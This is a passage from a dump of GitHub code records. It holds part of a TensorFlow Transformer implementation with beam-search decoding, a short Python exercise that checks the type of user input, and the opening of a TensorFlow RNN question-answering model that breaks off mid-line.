(for tokens to be \n masked).\n training: bool scalar, True if in training mode.\n\n Returns:\n outputs: float tensor of shape [batch_size, src_seq_len, hidden_size], the\n output source sequences.\n \"\"\"\n query = reference = self._layernorm_mha(inputs)\n outputs = self._mha(query, reference, padding_mask, training)\n ffn_inputs = self._dropout_mha(outputs, training=training) + inputs\n\n outputs = self._layernorm_ffn(ffn_inputs)\n outputs = self._ffn(outputs, training)\n outputs = self._dropout_ffn(outputs, training=training) + ffn_inputs\n return outputs\n\n\nclass DecoderLayer(tf.keras.layers.Layer):\n \"\"\"The building block that makes the decoder stack of layers, consisting of a \n self-attention sublayer, cross-attention sublayer and a feed-forward sublayer.\n \"\"\"\n def __init__(self, hidden_size, num_heads, filter_size, dropout_rate):\n \"\"\"Constructor.\n\n Args:\n hidden_size: int scalar, the hidden size of continuous representation.\n num_heads: int scalar, num of attention heads.\n filter_size: int scalar, the depth of the intermediate dense layer of the\n feed-forward sublayer.\n dropout_rate: float scalar, dropout rate for the Dropout layers.\n \"\"\"\n super(DecoderLayer, self).__init__()\n self._hidden_size = hidden_size\n self._num_heads = num_heads\n self._filter_size = filter_size\n self._dropout_rate = dropout_rate\n\n self._mha_intra = Attention(hidden_size, num_heads, dropout_rate)\n self._layernorm_mha_intra = tf.keras.layers.LayerNormalization() \n self._dropout_mha_intra = tf.keras.layers.Dropout(dropout_rate)\n\n self._mha_inter = Attention(hidden_size, num_heads, dropout_rate)\n self._layernorm_mha_inter = tf.keras.layers.LayerNormalization() \n self._dropout_mha_inter = tf.keras.layers.Dropout(dropout_rate) \n\n self._ffn = FeedForwardNetwork(hidden_size, filter_size, dropout_rate)\n self._layernorm_ffn = tf.keras.layers.LayerNormalization()\n self._dropout_ffn = tf.keras.layers.Dropout(dropout_rate)\n\n def call(self, \n inputs, \n encoder_outputs, \n look_ahead_mask, \n padding_mask, \n training, \n cache=None):\n \"\"\"Computes the output of the decoder layer.\n\n Args:\n inputs: float 
tensor of shape [batch_size, tgt_seq_len, hidden_size], the\n input target sequences.\n encoder_outputs: float tensor of shape [batch_size, src_seq_len, \n hidden_size], the encoded source sequences to be used as reference.\n look_ahead_mask: float tensor of shape [1, 1, tgt_seq_len, tgt_seq_len], \n populated with either 0 (for tokens to keep) or 1 (for tokens to be \n masked). \n padding_mask: float tensor of shape [batch_size, 1, 1, src_seq_len], \n populated with either 0 (for tokens to keep) or 1 (for tokens to be \n masked). \n training: bool scalar, True if in training mode.\n cache: (Optional) dict with entries\n 'k': tensor of shape [batch_size * beam_width, seq_len, num_heads, \n size_per_head],\n 'v': tensor of shape [batch_size * beam_width, seq_len, num_heads, \n size_per_head],\n 'tgt_tgt_attention': tensor of shape [batch_size * beam_width, \n num_heads, tgt_seq_len, tgt_seq_len],\n 'tgt_src_attention': tensor of shape [batch_size * beam_width, \n num_heads, tgt_seq_len, src_seq_len].\n Must be provided in inference mode.\n\n Returns:\n outputs: float tensor of shape [batch_size, tgt_seq_len, hidden_size], the\n output target sequences.\n \"\"\"\n query = reference = self._layernorm_mha_intra(inputs)\n outputs = self._mha_intra(\n query, reference, look_ahead_mask, training, cache=cache)\n mha_inter_inputs = self._dropout_mha_intra(outputs, training=training\n ) + inputs\n\n query, reference = self._layernorm_mha_inter(mha_inter_inputs\n ), encoder_outputs\n outputs = self._mha_inter(\n query, reference, padding_mask, training, cache=cache)\n ffn_inputs = self._dropout_mha_inter(outputs, training=training\n ) + mha_inter_inputs\n\n outputs = self._layernorm_ffn(ffn_inputs)\n outputs = self._ffn(outputs, training)\n outputs = self._dropout_ffn(outputs, training=training) + ffn_inputs\n return outputs\n\n\nclass Encoder(tf.keras.layers.Layer):\n \"\"\"The Encoder that consists of a stack of structurally identical layers.\"\"\"\n def __init__(\n self, stack_size, hidden_size, num_heads, filter_size, dropout_rate):\n \"\"\"Constructor.\n\n Args:\n stack_size: int scalar, num of layers in the stack.\n hidden_size: int scalar, the hidden size of continuous representation.\n num_heads: int scalar, num of attention heads.\n filter_size: int scalar, the depth of the intermediate dense layer of the\n feed-forward sublayer. \n dropout_rate: float scalar, dropout rate for the Dropout layers. \n \"\"\"\n super(Encoder, self).__init__()\n self._stack_size = stack_size \n self._hidden_size = hidden_size\n self._num_heads = num_heads\n self._filter_size = filter_size\n self._dropout_rate = dropout_rate\n\n self._stack = [EncoderLayer(hidden_size, \n num_heads, \n filter_size, \n dropout_rate) for _ in range(self._stack_size)]\n self._layernorm = tf.keras.layers.LayerNormalization() \n\n def call(self, inputs, padding_mask, training):\n \"\"\"Computes the output of the encoder stack of layers. \n\n Args:\n inputs: float tensor of shape [batch_size, src_seq_len, hidden_size], the\n input source sequences.\n padding_mask: float tensor of shape [batch_size, 1, 1, src_seq_len], \n populated with either 0 (for tokens to keep) or 1 (for tokens to be \n masked). 
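# utils.get_padding_mask is not shown in this file; a common implementation
# matching the documented [batch_size, 1, 1, src_seq_len] shape (1.0 marks
# positions to be masked; note this model passes SOS_ID as the padding id when
# it builds these masks) would look roughly like the sketch below. Treat it as
# an assumption, not the repository's actual code.
import tensorflow as tf

def get_padding_mask(token_ids, pad_id):
    # 1.0 where the token equals the padding id, 0.0 elsewhere; the two
    # singleton axes let the mask broadcast over heads and query positions.
    mask = tf.cast(tf.equal(token_ids, pad_id), tf.float32)
    return mask[:, tf.newaxis, tf.newaxis, :]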
\n training: bool scalar, True if in training mode.\n\n Returns:\n outputs: float tensor of shape [batch_size, src_seq_len, hidden_size], the\n output source sequences.\n \"\"\"\n for layer in self._stack:\n inputs = layer.call(inputs, padding_mask, training)\n outputs = self._layernorm(inputs)\n return outputs\n\n\nclass Decoder(tf.keras.layers.Layer):\n \"\"\"Decoder that consists of a stack of structurally identical layers.\"\"\"\n def __init__(\n self, stack_size, hidden_size, num_heads, filter_size, dropout_rate):\n \"\"\"Constructor.\n\n Args:\n stack_size: int scalar, the num of layers in the stack.\n hidden_size: int scalar, the hidden size of continuous representation.\n num_heads: int scalar, num of attention heads.\n filter_size: int scalar, the depth of the intermediate dense layer of the\n feed-forward sublayer. \n dropout_rate: float scalar, dropout rate for the Dropout layers. \n \"\"\"\n super(Decoder, self).__init__()\n self._stack_size = stack_size \n self._hidden_size = hidden_size\n self._num_heads = num_heads\n self._filter_size = filter_size\n self._dropout_rate = dropout_rate\n\n self._stack = [DecoderLayer(\n hidden_size, num_heads, filter_size, dropout_rate) \n for _ in range(self._stack_size)]\n self._layernorm = tf.keras.layers.LayerNormalization() \n \n def call(self, \n inputs, \n encoder_outputs, \n look_ahead_mask, \n padding_mask, \n training, \n cache=None):\n \"\"\"Computes the output of the decoder stack of layers.\n\n Args:\n inputs: float tensor of shape [batch_size, tgt_seq_len, hidden_size], the\n input target sequences.\n encoder_outputs: float tensor of shape [batch_size, src_seq_len, \n hidden_size], the encoded source sequences to be used as reference.\n look_ahead_mask: float tensor of shape [1, 1, tgt_seq_len, tgt_seq_len], \n populated with either 0 (for tokens to keep) or 1 (for tokens to be \n masked). \n padding_mask: float tensor of shape [batch_size, 1, 1, src_seq_len], \n populated with either 0 (for tokens to keep) or 1 (for tokens to be \n masked). \n training: bool scalar, True if in training mode.\n cache: (Optional) dict with keys 'layer_0', ... \n 'layer_[self.num_layers - 1]', where the value\n associated with each key is a dict with entries\n 'k': tensor of shape [batch_size * beam_width, seq_len, num_heads, \n size_per_head],\n 'v': tensor of shape [batch_size * beam_width, seq_len, num_heads, \n size_per_head],\n 'tgt_tgt_attention': tensor of shape [batch_size * beam_width, \n num_heads, tgt_seq_len, tgt_seq_len],\n 'tgt_src_attention': tensor of shape [batch_size * beam_width, \n num_heads, tgt_seq_len, src_seq_len]. 
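# Every sublayer in the encoder and decoder layers above follows the same
# pre-layer-norm residual recipe. Distilled into one hypothetical helper
# (the name is illustrative, not from this codebase):
def sublayer_connection(inputs, sublayer, layernorm, dropout, training):
    # normalize first, transform, apply dropout, then add the residual
    return dropout(sublayer(layernorm(inputs)), training=training) + inputs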
\n Must be provided in inference mode.\n\n Returns:\n outputs: float tensor of shape [batch_size, tgt_seq_len, hidden_size], the\n output target sequences.\n \"\"\"\n for i, layer in enumerate(self._stack):\n inputs = layer.call(inputs, \n encoder_outputs, \n look_ahead_mask, \n padding_mask, \n training, \n cache=cache['layer_%d' % i] \n if cache is not None else None)\n outputs = self._layernorm(inputs)\n return outputs\n\n\nclass TransformerModel(tf.keras.layers.Layer):\n \"\"\"Transformer model as described in https://arxiv.org/abs/1706.03762\n\n The model implements methods `call` and `transduce`, where\n - `call` is invoked in training mode, taking as input BOTH the source and \n target token ids, and returning the estimated logits for the target token \n ids.\n - `transduce` is invoked in inference mode, taking as input the source token \n ids ONLY, and outputting the token ids of the decoded target sequences \n using beam search. \n \"\"\"\n def __init__(self, \n vocab_size,\n encoder_stack_size=6, \n decoder_stack_size=6, \n hidden_size=512, \n num_heads=8, \n filter_size=2048, \n dropout_rate=0.1,\n extra_decode_length=50,\n beam_width=4,\n alpha=0.6):\n \"\"\"Constructor.\n\n Args:\n vocab_size: int scalar, num of subword tokens (including SOS/PAD and EOS) \n in the vocabulary. \n encoder_stack_size: int scalar, num of layers in encoder stack.\n decoder_stack_size: int scalar, num of layers in decoder stack.\n hidden_size: int scalar, the hidden size of continuous representation. \n num_heads: int scalar, num of attention heads.\n filter_size: int scalar, the depth of the intermediate dense layer of the\n feed-forward sublayer.\n dropout_rate: float scalar, dropout rate for the Dropout layers.\n extra_decode_length: int scalar, the max decode length would be the sum of\n `tgt_seq_len` and `extra_decode_length`.\n beam_width: int scalar, beam width for beam search.\n alpha: float scalar, the parameter for length normalization used in beam \n search.\n \"\"\"\n super(TransformerModel, self).__init__()\n self._vocab_size = vocab_size\n self._encoder_stack_size = encoder_stack_size\n self._decoder_stack_size = decoder_stack_size\n self._hidden_size = hidden_size\n self._num_heads = num_heads\n self._filter_size = filter_size\n self._dropout_rate = dropout_rate\n self._extra_decode_length = extra_decode_length\n self._beam_width = beam_width\n self._alpha = alpha\n\n self._embedding_logits_layer = EmbeddingLayer(vocab_size, hidden_size)\n self._encoder = Encoder(\n encoder_stack_size, hidden_size, num_heads, filter_size, dropout_rate)\n self._decoder = Decoder(\n decoder_stack_size, hidden_size, num_heads, filter_size, dropout_rate)\n\n self._encoder_dropout_layer = tf.keras.layers.Dropout(dropout_rate)\n self._decoder_dropout_layer = tf.keras.layers.Dropout(dropout_rate)\n\n def call(self, src_token_ids, tgt_token_ids):\n \"\"\"Takes as input the source and target token ids, and returns the estimated\n logits for the target sequences. Note this function should be called in \n training mode only.\n\n Args:\n src_token_ids: int tensor of shape [batch_size, src_seq_len], token ids\n of source sequences.\n tgt_token_ids: int tensor of shape [batch_size, tgt_seq_len], token ids \n of target sequences.\n\n Returns:\n logits: float tensor of shape [batch_size, tgt_seq_len, vocab_size]. 
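# The same _embedding_logits_layer instance is called in 'embedding' mode and
# in 'logits' mode throughout this model, i.e. the input embedding table and
# the output projection share weights. The real EmbeddingLayer lives in
# commons.layers and is not shown here; a hypothetical minimal version of such
# a dual-mode, weight-tied layer:
import tensorflow as tf

class TiedEmbedding(tf.keras.layers.Layer):
    def __init__(self, vocab_size, hidden_size):
        super().__init__()
        self.table = self.add_weight(
            name='table', shape=[vocab_size, hidden_size])

    def call(self, inputs, mode):
        if mode == 'embedding':
            return tf.gather(self.table, inputs)  # int ids -> vectors
        # vectors -> logits over the vocabulary, reusing the same table
        return tf.matmul(inputs, self.table, transpose_b=True)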
\n \"\"\"\n padding_mask = utils.get_padding_mask(src_token_ids, SOS_ID)\n encoder_outputs = self._encode(src_token_ids, padding_mask, training=True)\n logits = self._decode(\n tgt_token_ids, encoder_outputs, padding_mask)\n return logits\n\n def _encode(self, src_token_ids, padding_mask, training=False):\n \"\"\"Converts source sequences token ids into continuous representation, and \n computes the Encoder-encoded sequences.\n\n Args:\n src_token_ids: int tensor of shape [batch_size, src_seq_len], token ids\n of source sequences.\n padding_mask: float tensor of shape [batch_size, 1, 1, src_seq_len], \n populated with either 0 (for tokens to keep) or 1 (for tokens to be \n masked). \n training: bool scalar, True if in training mode.\n\n Returns:\n encoder_outputs: float tensor of shape [batch_size, src_seq_len, \n hidden_size], the encoded source sequences to be used as reference. \n \"\"\"\n src_seq_len = tf.shape(src_token_ids)[1]\n\n # [batch_size, src_seq_len, hidden_size]\n src_token_embeddings = self._embedding_logits_layer(\n src_token_ids, 'embedding')\n\n # [src_seq_len, hidden_size]\n positional_encoding = utils.get_positional_encoding(\n src_seq_len, self._hidden_size)\n src_token_embeddings += positional_encoding\n src_token_embeddings = self._encoder_dropout_layer(\n src_token_embeddings, training)\n\n encoder_outputs = self._encoder(\n src_token_embeddings, padding_mask, training)\n return encoder_outputs\n\n def _decode(self, tgt_token_ids, encoder_outputs, padding_mask):\n \"\"\"Computes the estimated logits of target token ids, based on the encoded \n source sequences. Note this function should be called in training mode only.\n\n Args:\n tgt_token_ids: int tensor of shape [batch_size, tgt_seq_len] token ids of \n target sequences.\n encoder_outputs: float tensor of shape [batch_size, src_seq_len, \n hidden_size], the encoded source sequences to be used as reference. \n padding_mask: float tensor of shape [batch_size, 1, 1, src_seq_len], \n populated with either 0 (for tokens to keep) or 1 (for tokens to be \n masked). \n\n Returns:\n logits: float tensor of shape [batch_size, tgt_seq_len, vocab_size].\n \"\"\"\n tgt_seq_len = tf.shape(tgt_token_ids)[1]\n\n # [batch_size, tgt_seq_len, hidden_size]\n tgt_token_embeddings = self._embedding_logits_layer(\n tgt_token_ids, 'embedding')\n\n # [tgt_seq_len, hidden_size]\n positional_encoding = utils.get_positional_encoding(\n tgt_seq_len, self._hidden_size)\n tgt_token_embeddings += positional_encoding\n tgt_token_embeddings = self._decoder_dropout_layer(\n tgt_token_embeddings, training=True) \n\n look_ahead_mask = utils.get_look_ahead_mask(tgt_seq_len)\n\n # [batch_size, tgt_seq_len, hidden_size]\n decoder_outputs = self._decoder(tgt_token_embeddings, \n encoder_outputs, \n look_ahead_mask, \n padding_mask, \n training=True)\n\n # [batch_size, tgt_seq_len, vocab_size]\n logits = self._embedding_logits_layer(decoder_outputs, 'logits')\n return logits\n\n def transduce(self, src_token_ids):\n \"\"\"Takes as input the source token ids only, and outputs the token ids of \n the decoded target sequences using beam search. 
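# utils.get_positional_encoding is not shown in this file either; for this
# architecture it is conventionally the sinusoidal encoding from the paper.
# A sketch of the concatenated sin/cos variant used by several TensorFlow
# implementations (assumes hidden_size is even):
import numpy as np

def get_positional_encoding(seq_len, hidden_size):
    pos = np.arange(seq_len)[:, None]                      # [seq_len, 1]
    i = np.arange(hidden_size // 2)[None, :]               # [1, hidden/2]
    angles = pos / np.power(10000.0, 2 * i / hidden_size)  # [seq_len, hidden/2]
    # the first half of the channels gets sin, the second half cos
    return np.concatenate([np.sin(angles), np.cos(angles)], axis=-1)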
Note this function should be \n called in inference mode only.\n\n Args:\n src_token_ids: int tensor of shape [batch_size, src_seq_len], token ids\n of source sequences.\n\n Returns:\n decoded_ids: int tensor of shape [batch_size, decoded_seq_len], the token\n ids of the decoded target sequences using beam search.\n scores: float tensor of shape [batch_size], the scores (length-normalized \n log-probs) of the decoded target sequences.\n tgt_tgt_attention: a list of `decoder_stack_size` float tensor of shape \n [batch_size, num_heads, decoded_seq_len, decoded_seq_len], \n target-to-target attention weights.\n tgt_src_attention: a list of `decoder_stack_size` float tensor of shape \n [batch_size, num_heads, decoded_seq_len, src_seq_len], target-to-source \n attention weights.\n src_src_attention: a list of `encoder_stack_size` float tensor of shape \n [batch_size, num_heads, src_seq_len, src_seq_len], source-to-source \n attention weights.\n \"\"\"\n batch_size, src_seq_len = tf.unstack(tf.shape(src_token_ids))\n max_decode_length = src_seq_len + self._extra_decode_length\n decoding_fn = self._build_decoding_fn(max_decode_length)\n decoding_cache = self._build_decoding_cache(src_token_ids, batch_size)\n sos_ids = tf.ones([batch_size], dtype='int32') * SOS_ID\n\n bs = beam_search.BeamSearch(decoding_fn, \n self._embedding_logits_layer._vocab_size, \n batch_size,\n self._beam_width, \n self._alpha, \n max_decode_length, \n EOS_ID)\n\n decoded_ids, scores, decoding_cache = bs.search(sos_ids, decoding_cache)\n\n tgt_tgt_attention = [\n decoding_cache['layer_%d' % i]['tgt_tgt_attention'].numpy()[:, 0]\n for i in range(self._decoder_stack_size)]\n tgt_src_attention = [\n decoding_cache['layer_%d' % i]['tgt_src_attention'].numpy()[:, 0]\n for i in range(self._decoder_stack_size)]\n\n decoded_ids = decoded_ids[:, 0, 1:]\n scores = scores[:, 0] \n\n src_src_attention = [\n self._encoder._stack[i]._mha._attention_weights.numpy()\n for i in range(self._encoder._stack_size)]\n\n return (decoded_ids, scores, \n tgt_tgt_attention, tgt_src_attention, src_src_attention)\n\n def _build_decoding_cache(self, src_token_ids, batch_size):\n \"\"\"Builds a dictionary that caches previously computed key and value feature\n maps and attention weights of the growing decoded sequence.\n\n Args:\n src_token_ids: int tensor of shape [batch_size, src_seq_len], token ids of \n source sequences. 
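# The `alpha` handed to BeamSearch above is the length-normalization exponent.
# The exact formula lives in commons.beam_search and is not shown here, but
# the customary GNMT-style score divides a hypothesis log-probability by a
# length penalty, roughly:
def length_normalized_score(log_prob, length, alpha=0.6):
    # alpha=0 disables normalization; alpha near 1 approaches per-token log-prob
    penalty = ((5.0 + length) / 6.0) ** alpha
    return log_prob / penalty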
\n batch_size: int scalar, num of sequences in a batch.\n\n Returns:\n decoding_cache: dict of entries\n 'encoder_outputs': tensor of shape [batch_size, src_seq_len, \n hidden_size],\n 'padding_mask': tensor of shape [batch_size, 1, 1, src_seq_len],\n\n and entries with keys 'layer_0',...,'layer_[decoder_num_layers - 1]'\n where the value associated with key 'layer_*' is a dict with entries\n 'k': tensor of shape [batch_size, 0, num_heads, size_per_head],\n 'v': tensor of shape [batch_size, 0, num_heads, size_per_head],\n 'tgt_tgt_attention': tensor of shape [batch_size, num_heads, \n 0, 0],\n 'tgt_src_attention': tensor of shape [batch_size, num_heads,\n 0, src_seq_len].\n \"\"\"\n padding_mask = utils.get_padding_mask(src_token_ids, SOS_ID)\n encoder_outputs = self._encode(src_token_ids, padding_mask, training=False)\n size_per_head = self._hidden_size // self._num_heads\n src_seq_len = padding_mask.shape[-1] \n\n decoding_cache = {'layer_%d' % layer:\n {'k':\n tf.zeros([\n batch_size, 0, self._num_heads, size_per_head\n ], 'float32'),\n 'v':\n tf.zeros([\n batch_size, 0, self._num_heads, size_per_head\n ], 'float32'),\n 'tgt_tgt_attention':\n tf.zeros([\n batch_size, self._num_heads, 0, 0], 'float32'), \n 'tgt_src_attention':\n tf.zeros([\n batch_size, self._num_heads, 0, src_seq_len], 'float32')\n\n } for layer in range(self._decoder._stack_size)\n }\n decoding_cache['encoder_outputs'] = encoder_outputs\n decoding_cache['padding_mask'] = padding_mask\n return decoding_cache\n\n def _build_decoding_fn(self, max_decode_length):\n \"\"\"Builds the decoding function that will be called in beam search.\n\n The function steps through the proposed token ids one at a time, and \n generates the logits of next token id over the vocabulary.\n\n Args:\n max_decode_length: int scalar, the decoded sequences would not exceed\n `max_decode_length`.\n\n Returns:\n decoding_fn: a callable that outputs the logits of the next decoded token\n ids.\n \"\"\"\n # [max_decode_length, hidden_size]\n timing_signal = utils.get_positional_encoding(\n max_decode_length, self._hidden_size)\n timing_signal = tf.cast(timing_signal, 'float32')\n\n def decoding_fn(decoder_input, cache, **kwargs):\n \"\"\"Computes the logits of the next decoded token ids.\n\n Args:\n decoder_input: int tensor of shape [batch_size * beam_width, 1], the \n decoded tokens at index `i`.\n cache: dict of entries\n 'encoder_outputs': tensor of shape \n [batch_size * beam_width, src_seq_len, hidden_size],\n 'padding_mask': tensor of shape\n [batch_size * beam_width, 1, 1, src_seq_len],\n\n and entries with keys 'layer_0',...,'layer_[decoder_num_layers - 1]'\n where the value associated with key 'layer_*' is a dict with entries\n 'k': tensor of shape [batch_size * beam_width, seq_len, num_heads, \n size_per_head],\n 'v': tensor of shape [batch_size * beam_width, seq_len, num_heads, \n size_per_head],\n 'tgt_tgt_attention': tensor of shape [batch_size * beam_width, \n num_heads, seq_len, seq_len],\n 'tgt_src_attention': tensor of shape [batch_size * beam_width, \n num_heads, seq_len, src_seq_len].\n Note `seq_len` is the running length of the growing decode sequence.\n kwargs: dict, storing the following additional keyword arguments.\n index -> int scalar tensor, the index of the `decoder_input` in the \n decoded sequence.\n\n Returns:\n logits: float tensor of shape [batch_size * beam_width, vocab_size].\n cache: a dict with the same structure as the input `cache`, except that\n the shapes of the values of key `k`, `v`, `tgt_tgt_attention`, \n 
`tgt_src_attention` are\n          [batch_size * beam_width, seq_len + 1, num_heads, size_per_head],\n          [batch_size * beam_width, seq_len + 1, num_heads, size_per_head],\n          [batch_size * beam_width, num_heads, seq_len + 1, seq_len + 1],\n          [batch_size * beam_width, num_heads, seq_len + 1, src_seq_len].\n      \"\"\"\n      index = kwargs['index']\n      # [batch_size * beam_width, 1, hidden_size]\n      decoder_input = self._embedding_logits_layer(decoder_input, 'embedding')\n      decoder_input += timing_signal[index:index + 1]\n\n      # [batch_size * beam_width, 1, hidden_size]\n      decoder_outputs = self._decoder(decoder_input,\n                                      cache['encoder_outputs'],\n                                      tf.zeros((1, 1, 1, index + 1), \n                                               dtype='float32'),\n                                      cache['padding_mask'],\n                                      training=False,\n                                      cache=cache)\n\n      # [batch_size * beam_width, 1, vocab_size]\n      logits = self._embedding_logits_layer(decoder_outputs, mode='logits')\n      logits = tf.squeeze(logits, axis=1)\n      return logits, cache\n\n    return decoding_fn \n","repo_name":"chao-ji/tf-transformer","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":25878,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"}
{"seq_id":"13730221270","text":"varijabla = input(\"Type something: \")\nprint(\"You typed it like a pro -\", varijabla)\n#print(type(varijabla))\n#tip = type(varijabla)\n\n\n\ntry:\n    val = int(varijabla)\n    print(\"Input is an integer number. Number = \", val)\nexcept ValueError:\n    try:\n        val = float(varijabla)\n        print(\"Input is a float number. Number = \", val)\n    except ValueError:\n        print(\"No.. input is not a number. It's a string\")\n","repo_name":"mentalcic/lpthw","sub_path":"ex11_study_drill.py","file_name":"ex11_study_drill.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"6534253487","text":"# -*- coding:utf-8 -*-\nimport tensorflow as tf\nimport os\n\n\nclass RNNQANet():\n    def __init__(self, pretrained_embedding, encoder_units_number=[300, 100], attention_size=[100], hidden_rnn_size=[100], learning_rate=0.001, log_dir='./logs', model_path='./RNNQANet'):\n        tf.reset_default_graph()\n        self.question = tf.placeholder(shape=[None, None], dtype=tf.int32, name='question')\n        self.context = tf.placeholder(shape=[None, None], dtype=tf.int32, name='context')\n        self.y_start = tf.placeholder(shape=[None], dtype=tf.int32, name='y_start')\n        self.y_end = tf.placeholder(shape=[None], dtype=tf.int32, name='y_end')\n        self.dropout_keep_prob = tf.placeholder(dtype=tf.float32, shape=[], name='dropout_keep_prob')\n        self.global_step = 0\n        self.model_path=model_path\n        with tf.variable_scope('embedding', initializer=tf.contrib.layers.xavier_initializer()):\n            W = tf.Variable(pretrained_embedding, trainable=True, dtype=tf.float32, name='W_emb')\n            self.question_input = tf.nn.embedding_lookup(ids=self.question, params=W)\n            self.context_input = tf.nn.embedding_lookup(ids=self.context, params=W)\n        \n        with tf.variable_scope('context_encoder', initializer=tf.contrib.layers.xavier_initializer(uniform=True)) as scope:\n            # Using Bidirectional RNN to encode context\n            # u_c=BiRNN(e_c)\n            fcell, bcell = self._biGRUs(encoder_units_number, activation=tf.nn.relu, keep_prob=self.dropout_keep_prob)\n            self.context_output, self.c_state = tf.nn.bidirectional_dynamic_rnn(inputs=self.context_input, cell_fw=fcell, cell_bw=bcell, dtype=tf.float32, scope=scope)\n            self.context_output = tf.concat(self.context_output, axis=-1)\n            self.context_output = 
tf.contrib.layers.layer_norm(self.context_output)\n tf.summary.histogram('context_encoder', self.context_output)\n \n with tf.variable_scope('question_encoder', initializer=tf.contrib.layers.xavier_initializer(uniform=True)) as scope:\n # Using Bidirectional RNN to encode question\n # u_q=BiRNN(e_q)\n fcell, bcell = self._biGRUs(encoder_units_number, activation=tf.nn.relu, keep_prob=self.dropout_keep_prob)\n self.question_output, self.q_state = tf.nn.bidirectional_dynamic_rnn(inputs=self.question_input, cell_fw=fcell, cell_bw=bcell, dtype=tf.float32, scope=scope)\n self.question_output = tf.concat(self.question_output, axis=-1)\n self.question_output = tf.contrib.layers.layer_norm(self.question_output)\n tf.summary.histogram('question_encoder', self.question_output)\n \n with tf.variable_scope('co_attention', initializer=tf.contrib.layers.xavier_initializer(uniform=True)):\n # Co-attention: context -> question\n # a_cq=attn_biRNN(u_c,u_q)\n self.cq_att = self.gated_attention(self.context_output, self.question_output, hidden=attention_size, scope='cq_attention')\n cqfcell, cqbcell = self._biGRUs(hidden_rnn_size, activation=tf.nn.relu, keep_prob=self.dropout_keep_prob)\n self.cq_att, _ = tf.nn.bidirectional_dynamic_rnn(inputs=self.cq_att, cell_fw=cqfcell, cell_bw=cqbcell, dtype=tf.float32, scope=tf.get_variable_scope().name + '/cq_attention_rnn')\n self.cq_att = tf.concat(self.cq_att, axis=-1)\n self.cq_att = tf.contrib.layers.layer_norm(self.cq_att)\n tf.summary.histogram('cq_att', self.cq_att)\n \n # Co-attention: question -> context\n # a_qc=attn_biRNN(u_q,u_c)\n self.qc_att = self.gated_attention(self.question_output, self.context_output, hidden=attention_size, scope='qc_attention')\n qcfcell, qcbcell = self._biGRUs(hidden_rnn_size, activation=tf.nn.relu, keep_prob=self.dropout_keep_prob)\n self.qc_att, _ = tf.nn.bidirectional_dynamic_rnn(inputs=self.qc_att, cell_fw=qcfcell, cell_bw=qcbcell, dtype=tf.float32, scope=tf.get_variable_scope().name + '/qc_attention_rnn')\n self.qc_att = tf.concat(self.qc_att, axis=-1)\n self.qc_att = tf.contrib.layers.layer_norm(self.qc_att)\n tf.summary.histogram('qc_att', self.qc_att)\n \n with tf.variable_scope('self_attention', initializer=tf.contrib.layers.xavier_initializer(uniform=True)):\n # Self-attention: a_cq -> a_cq\n # a_cc=attn_biRNN(a_cq,a_cq)\n self.cc_att = self.gated_attention(self.cq_att, self.cq_att, hidden=attention_size, scope='cc_attention')\n ccfcell, ccbcell = self._biGRUs(hidden_rnn_size, activation=tf.nn.relu, keep_prob=self.dropout_keep_prob)\n self.cc_att, _ = tf.nn.bidirectional_dynamic_rnn(inputs=self.cc_att, cell_fw=ccfcell, cell_bw=ccbcell, dtype=tf.float32, scope=tf.get_variable_scope().name + '/cc_attention_rnn')\n self.cc_att = tf.concat(self.cc_att, axis=-1)\n self.cc_att = tf.contrib.layers.layer_norm(self.cc_att)\n tf.summary.histogram('cc_att', self.cc_att)\n \n # Self-attention: a_qc -> a_qc\n # a_qq=attn_biRNN(a_qc,a_qc)\n self.qq_att = self.gated_attention(self.qc_att, self.qc_att, hidden=attention_size, scope='qq_attention')\n qqfcell, qqbcell = self._biGRUs(hidden_rnn_size, activation=tf.nn.relu, keep_prob=self.dropout_keep_prob)\n self.qq_att, _ = tf.nn.bidirectional_dynamic_rnn(inputs=self.qq_att, cell_fw=qqfcell, cell_bw=qqbcell, dtype=tf.float32, scope=tf.get_variable_scope().name + '/qq_attention_rnn')\n self.qq_att = tf.concat(self.qq_att, axis=-1)\n self.qq_att = tf.contrib.layers.layer_norm(self.qq_att)\n tf.summary.histogram('qq_att', self.qq_att)\n \n with tf.variable_scope('output_layer', 
initializer=tf.contrib.layers.xavier_initializer(uniform=True)) as scope:\n # Output-attention: a_cq -> a_qc\n # a_o1,a_o2=attn_biRNN(a_cc,a_qq)\n output_att = self.gated_attention(self.cc_att, self.qq_att, hidden=attention_size, scope='output_attention')\n output_att = tf.concat([self.context_output, output_att], axis=-1)\n fcell, bcell = self._biGRUs(hidden_rnn_size, activation=tf.nn.relu, keep_prob=self.dropout_keep_prob)\n output, _ = tf.nn.bidirectional_dynamic_rnn(inputs=output_att, cell_fw=fcell, cell_bw=bcell, dtype=tf.float32, scope=scope)\n \n # use forward output to generate y1\n self.start_output = output[0]\n self.start_output = tf.contrib.layers.layer_norm(self.start_output)\n tf.summary.histogram('start_output', self.start_output)\n \n # use backward output to generate y2\n self.end_output = output[1]\n self.end_output = tf.contrib.layers.layer_norm(self.end_output)\n tf.summary.histogram('end_output', self.end_output)\n \n with tf.variable_scope('start_decoder', initializer=tf.contrib.layers.xavier_initializer(uniform=True)):\n # p_y1=RNN(a_o1)\n cell = [self._add_GRU(50, activation=tf.nn.relu), self._add_GRU(25, activation=tf.nn.relu), self._add_GRU(1, activation=tf.nn.relu)]\n cell = tf.contrib.rnn.MultiRNNCell(cells=cell, state_is_tuple=True)\n self.y_predict_start, _ = tf.nn.dynamic_rnn(cell=cell, inputs=self.start_output, dtype=tf.float32)\n self.y_predict_start = tf.unstack(self.y_predict_start, axis=-1)[0]\n tf.summary.histogram('y_predict_start', self.y_predict_start)\n self.y_predict_start_softmax = tf.nn.softmax(self.y_predict_start)\n self.y_predict_start_index = tf.argmax(self.y_predict_start_softmax, axis=1)\n self.y_start_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.y_predict_start, labels=self.y_start)\n tf.summary.scalar('start_loss', tf.reduce_mean(self.y_start_loss))\n \n with tf.variable_scope('end_decoder', initializer=tf.contrib.layers.xavier_initializer(uniform=True)):\n # p_y2=RNN(a_o2)\n cell = [self._add_GRU(50, activation=tf.nn.relu), self._add_GRU(25, activation=tf.nn.relu), self._add_GRU(1, activation=tf.nn.relu)]\n cell = tf.contrib.rnn.MultiRNNCell(cells=cell, state_is_tuple=True)\n self.y_predict_end, _ = 